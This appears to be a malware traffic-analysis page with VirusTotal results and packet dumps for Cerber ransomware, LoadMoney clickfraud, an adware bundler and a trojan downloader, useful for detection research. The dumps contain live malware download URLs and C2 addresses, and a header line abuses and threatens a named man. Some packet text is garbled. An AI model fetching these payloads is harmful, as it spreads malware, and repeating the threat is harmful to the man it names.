Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

p.exe Loads Ransomware Cerber Variant 91.190.218.63 40.117.145.132 443 PCAP File Download Traffic Analysis

SHA256: 71b2f1c5642d24c7f35479399c96cc572b1f0a24d4843ed0fddbf93af12d59c3
File name: p.exe
Detection ratio: 36 / 56
Analysis date: 2016-11-27 00:03:46 UTC ( 0 minutes ago )
GData Trojan.GenericKD.3764705 20161127
Ikarus Trojan.Win32.Filecoder 20161126
Invincea virus.win32.sality.at 20161018
K7GW Trojan ( 004e16c11 ) 20161127
Kaspersky Trojan.Win32.Inject.acgan 20161127
Malwarebytes Trojan.MalPack.NSIS 20161127
McAfee Artemis!81D6AF74652B 20161127
McAfee-GW-Edition BehavesLike.Win32.Ransom.cc 20161126
eScan Trojan.GenericKD.3764705 20161127
Microsoft Ransom:Win32/Cerber 20161126
Panda Trj/Genetic.gen 20161126
Qihoo-360 HEUR/QVM20.1.6872.Malware.Gen 20161127
Sophos Mal/Generic-S 20161127
Symantec Trojan.Gen 20161127
Tencent Win32.Trojan.Inject.Auto 20161127
TrendMicro-HouseCall TROJ_GEN.R047H09KP16 20161127
VIPRE Trojan.Win32.Generic!BT 20161126
nProtect Ransom/W32.Cerber.163103 20161126

2016-11-26 17:43:28.144466 IP 192.168.1.102.51195 > 203.162.253.20.80: Flags [P.], seq 0:376, ack 1, win 256, length 376: HTTP: GET /p.exe HTTP/1.1
E….L@…WF…f…….P~..*%…P…….GET /p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
If-Modified-Since: Fri, 25 Nov 2016 10:44:39 GMT
If-None-Match: “400fc-27d1f-5421dcf159061″
Host: 203.162.253.20
Connection: Keep-Alive

2016-11-26 17:43:28.413173 IP 192.168.1.102.51195 > 203.162.253.20.80: Flags [F.], seq 376, ack 153, win 256, length 0
E..(.M@…X….f…….P~…%..1P…./……..
2016-11-26 17:43:28.413507 IP 192.168.1.102.51195 > 203.162.253.20.80: Flags [.], ack 154, win 256, length 0
E..(.N@…X….f…….P~…%..2P………….
2016-11-26 17:43:30.660646 IP 192.168.1.102.51177 > 40.117.145.132.443: Flags [P.], seq 2656244277:2656244730, ack 2896471773, win 32665, length 453
E…H.@…4….f(u…….S.5….P……………P.?..*z^.}…I.;6……w.M._..  .y…..3oDdS..*<…S.’`….}….#.~3R.C..\….+4…Zn..[.[.cc/….'(O….3…..|8…\I.hz|X.-)..9….. d…..l….~..l&.S.!.`.d..=N.6..mYl.
S..&.q.c..X ….+…….X.y..F7f1.C………..v.G……3f..X |.C..w”.[@..5…..kQ.D..rM..y…….’o….x.?_…!)0H..Y.&…W…b….m..+2l..I.E.: ….1Y..C..N…..      ..c.5u..R-.=..a.z3…8.N..\….rVyJG……~..t…………      b…..2
(vIwB-m…………..l..O.c…………….O
2016-11-26 17:43:30.660768 IP 192.168.1.102.51177 > 40.117.145.132.443: Flags [P.], seq 453:1482, ack 1, win 32665, length 1029
E..-H.@…2A…f(u…….S……P………….=S….N..I.2._………(.’J…..;m…..W.@….I…wg…`..6r…1jX…D..e……..^.-…..6.x;14O..a…nNsFG…C;.(……..’….VE.3.sJ….l…….        …f:….q.um.hU..`\..}….~..`../x.{AM….6.q@.X…d*…,. .’S..?*….u…+……….E…&..D7…i.tI……..L.D..p…..;Qp.B..Y.N2……:r.X>……r
E….P…t..(..d5..E..s……..Z..v……H..,Q.g…. ..1<=Z…f.8…6..]…………|…_..1.)…8.(.$..N$j2….K…U   .Q.3..t.h…..E….Fa.=h.]……>..%$..&}./..>….3]c…..y…..l3….K..*P.X.7…ad…..*……^.c..s…%.(.E9……O…S…;’. .^…).L…………..@.\…j…]…a-3.`{$…..”Z[…>.t6….23..l.a.6^L.g.U..2W.. 9……EO.f<l…….Sd..E….b..d.c..)..I.s&p……7E..yQ..q..X….N.{..)_CFQ………….]….=..^”.#d.^Eja<On..f+……?…      .       …..o….@.mz..r.G.}..#.a0……….k.f…..so.|.#….m……U@h.L[c4.Aa…….C..x….K5#…u..2.W..O#
…]u.8..D..B…Y.T9…..:….:.*|.Oo}….n..O…;wP<..!-EY..7…i…..i..s..T.g….A..1W……GW….’.ee..q…v..P.x…%..jo.l{..’^.x…..h../…R..a’.WM.#N.I..
2016-11-26 17:43:31.508088 IP 192.168.1.102.51177 > 40.117.145.132.443: Flags [.], ack 358, win 32620, length 0
E..(H.@…6E…f(u…….S…..BP..l……….
2016-11-26 17:43:34.260439 IP 192.168.1.102.59393 > 192.168.1.111.3074: UDP, length 52
E..P……6….f…o…..<..`…..;. …^.y.4;…+cV ….8..<S…+cV….um……
2016-11-26 17:43:34.311136 IP 192.168.1.111.3074 > 192.168.1.102.59393: UDP, length 52
E..Pp…..Fe…o…f…..<..`…..;. ….8..<S…+cV …^.y.4;…+cV…rIk……
2016-11-26 17:43:34.418756 IP 192.168.1.102.59393 > 192.168.1.111.3074: UDP, length 52
E..P……6….f…o…..<..`…..;. …^.y.4;…+cV ….8..<S…+cV…e./……
2016-11-26 17:43:35.871629 IP 192.168.1.102.54451 > 75.75.75.75.53: 37685+ A? wpad.hsd1.md.comcast.net. (42)
E..F…….,…fKKKK…5.2…5………..wpad.hsd1.md.comcast.net…..
2016-11-26 17:43:43.691442 IP 192.168.1.102.43887 > 41.218.223.2.26881: UDP, length 18
E…’…..H6…f)….oi……)….W..U…+.;..
2016-11-26 17:43:44.599775 IP 192.168.1.102.51152 > 91.190.218.63.443: Flags [.], ack 4120564365, win 256, length 0
E..(..@……..f[..?….|..z….P………….
2016-11-26 17:43:44.600056 IP 192.168.1.102.51152 > 91.190.218.63.443: Flags [F.], seq 0, ack 1, win 256, length 0
E..(.   @……..f[..?….|..z….P………….
2016-11-26 17:43:44.832551 IP 192.168.1.102.51170 > 40.122.162.208.443: Flags [R.], seq 4268482331, ack 2518277989, win 0, length 0
E..(u~@……..f(z…….k…..eP………….
2016-11-26 17:43:44.832961 IP 192.168.1.102.51163 > 157.56.52.40.40012: Flags [P.], seq 2141827235:2141827479, ack 1684209167, win 256, length 244
E…b.@….X…f.84(…L….db..P…….c…9_T…o7..M+..3-k..o.}..%.*..7…6.H…..L>r……..&_..(..Oz…..X..H;f:……..K…${.C…..]M.X6….T.<.8.R….@q….Y…04.o…..<….-.|!uy.<………..O….d….F…~….M.;…f…8..B$..|.7.%..N.HE……c1.V..D.w……..n..e.G…m._.
2016-11-26 17:43:44.833430 IP 192.168.1.102.51163 > 157.56.52.40.40012: Flags [P.], seq 244:260, ack 1, win 256, length 16
E..8b.@….;…f.84(…L….db..P….L..n..;I8.Q..\.”…
2016-11-26 17:43:44.971065 IP 192.168.1.102.51163 > 157.56.52.40.40012: Flags [.], ack 5, win 256, length 0
E..(b.@….J…f.84(…L….db..P…#v……..

Snurrepin.com Delivers doc.exe CERBER Ransomware Malware PCAP File Download Traffic Analysis

SHA256: 69e6f40fa4231edb47d52b5a19de15720b3e5fc19f68bb3060e9b6e06c307d42
File name: doc.exe
Detection ratio: 9 / 56
Analysis date: 2016-11-26 23:56:21 UTC ( 0 minutes ago )
CrowdStrike Falcon (ML) malicious_confidence_75% (W) 20161024
ESET-NOD32 NSIS/Injector.KT 20161126
Invincea virus.win32.sality.at 20161018
Kaspersky UDS:DangerousObject.Multi.Generic 20161127
McAfee Artemis!4D4D6D2C7CC6 20161127
McAfee-GW-Edition BehavesLike.Win32.Downloader.dc 20161126
Qihoo-360 HEUR/QVM42.0.0000.Malware.Gen 20161127
Rising Malware.FakePDF@CV!1.6AC1-LyO8PTdeqgK (cloud) 20161126
Symantec Ransom.Cerber 20161127

2016-11-26 17:05:51.661059 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /doc.exe HTTP/1.1
E…..@….Y…fY!…@.PQf-.DC..P…”S..GET /doc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=214078-
Unless-Modified-Since: Sat, 26 Nov 2016 19:38:19 GMT
If-Range: “46448-54239617f5e88″
Host: snurrepin.com
Connection: Keep-Alive

2016-11-26 17:06:03.817526 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 555, win 256, length 0
E..(y.@….j…f.m.1.L..r.MT…xP………….
2016-11-26 17:06:06.750700 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [F.], seq 1829, ack 4858, win 257, length 0
E..(y.@….i…f.m.1.>…..Q../SP………….
2016-11-26 17:06:06.750911 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [F.], seq 274, ack 669, win 256, length 0
E..(.V@…D$…f.m…3.P…-.}..P………….
2016-11-26 17:06:06.751057 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [F.], seq 2487, ack 225525, win 256, length 0
E..(.a@……..f.@Ip.6…J.F….P………….
2016-11-26 17:06:06.751180 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [F.], seq 1584, ack 172165, win 256, length 0
E..(.b@……..f.@Ip.=..^.g..S..P…NF……..
2016-11-26 17:06:06.752556 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [F.], seq 392, ack 74057, win 256, length 0
E..(..@……..fY!…@.PQf/`DD./P…L………
2016-11-26 17:06:06.752624 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [F.], seq 878, ack 555, win 256, length 0
E..(y.@….g…f.m.1.L..r.MT…xP………….
2016-11-26 17:06:06.752691 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [F.], seq 1882, ack 75023, win 256, length 0
E..(.c@……..f.@Ip.<……….P….-……..
2016-11-26 17:06:06.752880 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [F.], seq 2817, ack 394566, win 695, length 0
E..(.d@……..f.@Ip.7..B…….P…Y………
2016-11-26 17:06:06.784774 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [R.], seq 2488, ack 225554, win 0, length 0
E..(.e@……..f.@Ip.6…J.G….P………….
2016-11-26 17:06:06.785440 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [R.], seq 1883, ack 75052, win 0, length 0
E..(.f@……..f.@Ip.<……….P………….
2016-11-26 17:06:06.793362 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [R.], seq 2818, ack 394595, win 0, length 0
E..(.g@……..f.@Ip.7..B……2P…\K……..
2016-11-26 17:06:06.793768 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [R.], seq 1585, ack 172194, win 0, length 0
E..(.h@……..f.@Ip.=..^.g..S..P…O%……..
2016-11-26 17:06:06.833382 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [.], ack 4859, win 257, length 0
E..(y.@….f…f.m.1.>…..R../TP………….
2016-11-26 17:06:06.838734 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 556, win 256, length 0
E..(y.@….e…f.m.1.L..r.MU…yP………….
2016-11-26 17:06:06.839238 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [.], ack 670, win 256, length 0
E..(.Z@…D …f.m…3.P…..}..P………….
2016-11-26 17:06:06.991510 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [.], ack 74058, win 256, length 0
E..(..@……..fY!…@.PQf/aDD.0P…L………
2016-11-26 17:06:12.808611 IP 192.168.1.102.56893 > 192.168.0.0.6892: UDP, length 10
E..&B…..v….f…..=….CYhi008e906a……..
2016-11-26 17:06:12.808689 IP 192.168.1.102.56893 > 192.168.0.1.6892: UDP, length 10
E..&>…..z….f…..=….CXhi008e906a……..
2016-11-26 17:06:12.808695 IP 192.168.1.102.56893 > 192.168.0.2.6892: UDP, length 10
E..&…….f…f…..=….CWhi008e906a……..
2016-11-26 17:06:12.808741 IP 192.168.1.102.56893 > 192.168.0.3.6892: UDP, length 10
E..&|{….<….f…..=….CVhi008e906a……..
2016-11-26 17:06:12.808826 IP 192.168.1.102.56893 > 192.168.0.4.6892: UDP, length 10
E..&e…..Sw…f…..=….CUhi008e906a……..
2016-11-26 17:06:12.808832 IP 192.168.1.102.56893 > 192.168.0.5.6892: UDP, length 10
E..&a…..W….f…..=….CThi008e906a……..
2016-11-26 17:06:12.808878 IP 192.168.1.102.56893 > 192.168.0.6.6892: UDP, length 10
E..&’……j…f…..=….CShi008e906a……..
2016-11-26 17:06:12.808961 IP 192.168.1.102.56893 > 192.168.0.7.6892: UDP, length 10

2016-11-26 17:06:12.810660 IP 192.168.1.102.56893 > 194.165.16.13.6892: UDP, length 10
E..&    B………f…..=….1Ohi008e906a……..
2016-11-26 17:06:12.810755 IP 192.168.1.102.56893 > 194.165.16.14.6892: UDP, length 10
E..&C,….c….f…..=….1Nhi008e906a……..
2016-11-26 17:06:12.810761 IP 192.168.1.102.56893 > 194.165.16.15.6892: UDP, length 10
E..&O;….W….f…..=….1Mhi008e906a……..
2016-11-26 17:06:12.810837 IP 192.168.1.102.56893 > 194.165.16.16.6892: UDP, length 10
E..&o^….7….f…..=….1Lhi008e906a……..
2016-11-26 17:06:12.810842 IP 192.168.1.102.56893 > 194.165.16.17.6892: UDP, length 10
E..&c…..Cu…f…..=….1Khi008e906a……..
2016-11-26 17:06:12.810887 IP 192.168.1.102.56893 > 194.165.16.18.6892: UDP, length 10
E..&)i….}….f…..=….1Jhi008e906a……..
2016-11-26 17:06:12.810972 IP 192.168.1.102.56893 > 194.165.16.19.6892: UDP, length 10
E..&%x………f…..=….1Ihi008e906a……..
2016-11-26 17:06:12.811021 IP 192.168.1.102.56893 > 194.165.16.20.6892: UDP, length 10
E..&.V………f…..=….1Hhi008e906a……..
2016-11-26 17:06:12.811026 IP 192.168.1.102.56893 > 194.165.16.21.6892: UDP, length 10
E..&…….y…f…..=….1Ghi008e906a……..
2016-11-26 17:06:12.811078 IP 192.168.1.102.56893 > 194.165.16.22.6892: UDP, length 10
E..&Jq….\….f…..=….1Fhi008e906a……..
2016-11-26 17:06:12.811153 IP 192.168.1.102.56893 > 194.165.16.23.6892: UDP, length 10
E..&F…..`|…f…..=….1Ehi008e906a……..
2016-11-26 17:06:12.811158 IP 192.168.1.102.56893 > 194.165.16.24.6892: UDP, length 10
E..&………..f…..=….1Dhi008e906a……..
2016-11-26 17:06:12.811203 IP 192.168.1.102.56893 > 194.165.16.25.6892: UDP, length 10
E..&………..f…..=….1Chi008e906a……..
2016-11-26 17:06:12.811273 IP 192.168.1.102.56893 > 194.165.16.26.6892: UDP, length 10
E..&X…..N….f…..=….1Bhi008e906a……..
2016-11-26 17:06:12.811330 IP 192.168.1.102.56893 > 194.165.16.27.6892: UDP, length 10
E..&T…..Q….f…..=….1Ahi008e906a……..
2016-11-26 17:06:12.811380 IP 192.168.1.102.56893 > 194.165.16.28.6892: UDP, length 10
E..&}…..)….f…..=….1@hi008e906a……..
2016-11-26 17:06:12.811385 IP 192.168.1.102.56893 > 194.165.16.29.6892: UDP, length 10
E..&r…..4….f…..=….1?hi008e906a……..
2016-11-26 17:06:12.811438 IP 192.168.1.102.56893 > 194.165.16.30.6892: UDP, length 10
E..&;…..j….f…..=….1>hi008e906a……..
2016-11-26 17:06:12.811511 IP 192.168.1.102.56893 > 194.165.16.31.6892: UDP, length 10
E..&8…..n….f…..=….1=hi008e906a……..
2016-11-26 17:06:12.811516 IP 192.168.1.102.56893 > 194.165.16.32.6892: UDP, length 10
E..&l…..:….f… .=….1<hi008e906a……..
2016-11-26 17:06:12.811563 IP 192.168.1.102.56893 > 194.165.16.33.6892: UDP, length 10
E..&g…..>….f…!.=….1;hi008e906a……..
2016-11-26 17:06:12.811645 IP 192.168.1.102.56893 > 194.165.16.34.6892: UDP, length 10
E..&……x….f…”.=….1:hi008e906a……..
2016-11-26 17:06:12.811650 IP 192.168.1.102.56893 > 194.165.16.35.6892: UDP, length 10
E..&!……….f…#.=….19hi008e906a……..
2016-11-26 17:06:12.811698 IP 192.168.1.102.56893 > 194.165.16.36.6892: UDP, length 10
E..&    ……….f…$.=….18hi008e906a……..
2016-11-26 17:06:12.811779 IP 192.168.1.102.56893 > 194.165.16.37.6892: UDP, length 10
:

Graftor LoadMoney 185.20.186.52 Malware Trojan Clickfraud PCAP File Download Traffic Analysis

SHA256: 572b756cd5cfda893c5e32f7bdcb4e44d57e7101b507afcdee8646b3417fe6e3
File name: autorun.exe
Detection ratio: 47 / 56
Analysis date: 2016-11-26 23:22:55 UTC ( 0 minutes ago )
AhnLab-V3 PUP/Win32.LoadMoney.C1370399 20161126
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161126
Arcabit Trojan.Graftor.D42051 20161126
Avast Win32:Malware-gen 20161126
Avira (no cloud) APPL/Agent.755 20161126
BitDefender Gen:Variant.Graftor.270417 20161126
CAT-QuickHeal Trojan.Mupad 20161126
Comodo ApplicUnwnt.Win32.RuKometa.~A 20161126
CrowdStrike Falcon (ML) malicious_confidence_68% (D) 20161024
Cyren W32/Selfdel.N 20161127
DrWeb Trojan.LoadMoney.1377 20161127
ESET-NOD32 a variant of Win32/RuKometa.E potentially unwanted 20161126
Emsisoft Gen:Variant.Graftor.270417 (B) 20161127
F-Prot W32/Selfdel.N 20161127
F-Secure Gen:Variant.Graftor.270417 20161127
Fortinet W32/SelfDel.BTBP!tr 20161127
GData Gen:Variant.Graftor.270417

2016-11-26 17:34:54.019260 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [P.], seq 0:386, ack 1, win 256, length 386: HTTP: GET /autorun.exe HTTP/1.1
E….K@……..fRv.`.G.P~..:.S..P…….GET /autorun.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 07 Apr 2016 10:57:14 GMT
If-None-Match: “57063d0a-30a50”
Host: uhfoeujcqfoihdi.referparty.ru
Connection: Keep-Alive

2016-11-26 17:34:54.169528 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [.], ack 172, win 255, length 0
E..(.L@……..fRv.`.G.P~….S..P…9………
2016-11-26 17:34:54.171251 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [F.], seq 386, ack 172, win 255, length 0
E..(.M@……..fRv.`.G.P~….S..P…9………
2016-11-26 17:34:57.514854 IP 192.168.1.102.62604 > 75.75.75.75.53: 25856+ A? crl.usertrust.com. (35)
E..?…….R…fKKKK…5.+.We…………crl    usertrust.com…..
2016-11-26 17:34:57.536654 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags185.20.186.52 [S], seq 1392431157, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..f..S..H.PR..5…… ..3…………..
2016-11-26 17:34:57.572643 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [.], ack 1689782253, win 256, length 0
E..(..@……..f..S..H.PR..6d…P….Q……..
2016-11-26 17:34:57.573155 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [P.], seq 0:198, ack 1, win 256, length 198: HTTP: GET /AddTrustExternalCARoot.crl HTTP/1.1
E…..@….’…f..S..H.PR..6d…P…….GET /AddTrustExternalCARoot.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.usertrust.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

 

2016-11-26 17:35:01.948228 IP 192.168.1.102.51018 > 185.20.186.52.80: Flags [P.], seq 0:488, ack 1, win 256, length 488: HTTP: GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E…..@……..f…4.J.Pl1…..eP….x..GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: autorun 3.20
Host: g.azmagis.ru
Cache-Control: no-cache

speedupmypc.exe Speed Up My PC PUP Adware Riskware Bundler PCAP File Download Traffic Sample

SHA256: fd399751ceb5ed4c25d690f2f10aabeb4dfad6341714029c24748df0481963f0
File name: speedupmypc.exe
Detection ratio: 15 / 56
Analysis date: 2016-11-16 04:24:21 UTC ( 0 minutes ago )
AVG PCSB.C 20161116
AVware Trojan.Win32.Generic!BT 20161116
AegisLab W32.Application.Uniblue!c 20161116
DrWeb Program.Unwanted.1514 20161116
ESET-NOD32 Win32/SpeedUpMyPC.A potentially unwanted 20161116
Fortinet Riskware/SpeedUpMyPC 20161116
GData Win32.Application.Uniblue.A 20161116
Ikarus PUA.Uniblue 20161115
Invincea virus.win32.sality.at 20161018
K7AntiVirus Adware ( 004bb0441 ) 20161115
K7GW Adware ( 004bb0441 ) 20161116
Malwarebytes PUP.Optional.Uniblue 20161116
McAfee-GW-Edition BehavesLike.Win32.Obfuscated.tc 20161116
SUPERAntiSpyware PUP.SpeedUpMyPC/Variant 20161116
VIPRE Trojan.Win32.Generic!BT 20161116

2016-11-15 18:43:07.173960 IP 192.168.1.102.52775 > 107.20.189.243.80: Flags [P.], seq 0:342, ack 1, win 256, length 342: HTTP: GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
E..~I.@….r…fk….’.P ….R..P…v…GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: download.uniblue.com
Connection: Keep-Alive

2016-11-15 18:43:07.211074 IP 192.168.1.102.63208 > 75.75.75.75.53: 51033+ A? files.uniblue.com. (35)
E..?p…..qw…fKKKK…5.+P..Y………..files.uniblue.com…..

E..(s.@….p…f4….(.P’..X)].$P………….
2016-11-15 18:43:07.268182 IP 192.168.1.102.52776 > 52.216.1.203.80: Flags [P.], seq 0:461, ack 1, win 257, length 461: HTTP: GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
E…s.@……..f4….(.P’..X)].$P…1…GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: files.uniblue.com
Connection: Keep-Alive
Range: bytes=451813-
Unless-Modified-Since: Tue, 19 Jul 2016 16:26:19 GMT
If-Range: “3f2ec3ba48632a2368c774747fb9ad58”


E..(j.@…`….f.4U..).P.t._I…P………….
2016-11-15 18:43:10.845116 IP 192.168.1.102.52777 > 23.52.85.163.80: Flags [P.], seq 0:173, ack 1, win 256, length 173: HTTP: GET /sf.crl HTTP/1.1
E…j.@…`F…f.4U..).P.t._I…P…….GET /sf.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: sf.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2016-11-15 18:43:10.868334 IP 192.168.1.102.52777 > 23.52.85.163.80: Flags [.], ack 2921, win 256, length 0
E..(j.@…`….f.4U..).P.t..I..sP…t………

E..(.4@……..f6.Q..*.P…..;.{P…6o……..
2016-11-15 18:43:15.554941 IP 192.168.1.102.52778 > 54.247.81.186.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: POST /v1/collect HTTP/1.1
E….5@….A…f6.Q..*.P…..;.{P…I…POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 192
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

{“recipient”:”uniblue.sp-6_0_15_0.web”,”client_id”:””,”event”:”prod.sp.mypcbackup_offer_included.cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe”,”buildtest_id”:””,”unit_id”:”740″}
2016-11-15 18:43:15.593326 IP 192.168.1.102.52780 > 54.247.81.186.80: Flags [S], seq 1602288928, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

2016-11-15 18:43:42.475266 IP 192.168.1.102.52780 > 54.247.81.186.80: Flags [P.], seq 1208:1630, ack 526, win 254, length 422: HTTP: POST /v1/collect HTTP/1.1
E….E@….%…f6.Q..,.P_…..6.P…….POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 204
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

{“recipient”:”uniblue.sp-6_0_15_0.web”,”client_id”:””,”event”:”prod.sp.install_standalone_download_completed.cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe”,”buildtest_id”:””,”unit_id”:”740″}
2016-11-15 18:43:42.672871 IP 192.168.1.102.52780 > 54.247.81.186.80: Flags [.], ack 701, win 253, length 0
E..(.F@……..f6.Q..,.P_…..7MP………….

E..(p.@…1Y…f.”…3.P..:^..Q.P…o………
2016-11-15 18:43:48.292481 IP 192.168.1.102.52787 > 176.34.230.166.80: Flags [P.], seq 0:408, ack 1, win 256, length 408: HTTP: POST /v1/collect HTTP/1.1
E…p.@…/….f.”…3.P..:^..Q.P…….POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 190
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

{“recipient”:”uniblue.sp-6_0_15_0.standalone”,”client_id”:””,”event”:”prod.sp.install_launched.cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe”,”buildtest_id”:””,”unit_id”:”740″}
2016-11-15 18:43:48.509108 IP 192.168.1.102.52787 > 176.34.230.166.80: Flags [.], ack 176, win 255, length 0
E..(p.@…1W…f.”…3.P..;…R\P…m………

E..(p.@…1V…f.”…2.P!qP.u.v_P…)………
2016-11-15 18:43:49.461154 IP 192.168.1.102.52786 > 176.34.230.166.80: Flags [P.], seq 0:419, ack 1, win 256, length 419: HTTP: POST /v1/collect HTTP/1.1
E…p.@…/….f.”…2.P!qP.u.v_P….X..POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 201
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

microsoftsup.com POST /gate.php Trojan Malware Downloader PCAP file download traffic sample

SHA256: 55754d7bc221d58cebc24daeb3476fa2dbfdaf6ab75e9d3a30456dd5cbf589e5
File name: 2.exe
Detection ratio: 49 / 56
Analysis date: 2016-11-16 03:38:39 UTC ( 0 minutes ago )
ALYac Trojan.Generic.19684864 20161116
AVG Win32/Blacked 20161116
AVware Trojan.Win32.Generic!BT 20161116
Ad-Aware Trojan.Generic.19684864 20161116
AegisLab Troj.W32.Generic!c 20161116
AhnLab-V3 Trojan/Win32.Generic.N2111031230 20161116
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161116
Arcabit Trojan.Generic.D12C5E00 20161116
Avast Win32:Adware-gen [Adw] 20161116
Avira (no cloud) TR/Black.Gen2 20161116
Baidu Win32.Packed.VMProtect.a 20161115
BitDefender Trojan.Generic.19684864 20161116
Bkav HW32.Packed.509F 20161112
CAT-QuickHeal TrojanPWS.Fareit 20161115
ClamAV Win.Trojan.Generic-1750 20161116
Comodo UnclassifiedMalware 20161116
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
Cyren

 

2016-11-15 19:21:22.301485 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
E..NF.@…p….f;.D….P…}.p.sP…H”..GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-usmicrosoftsup.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive

2016-11-15 19:21:22.559324 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
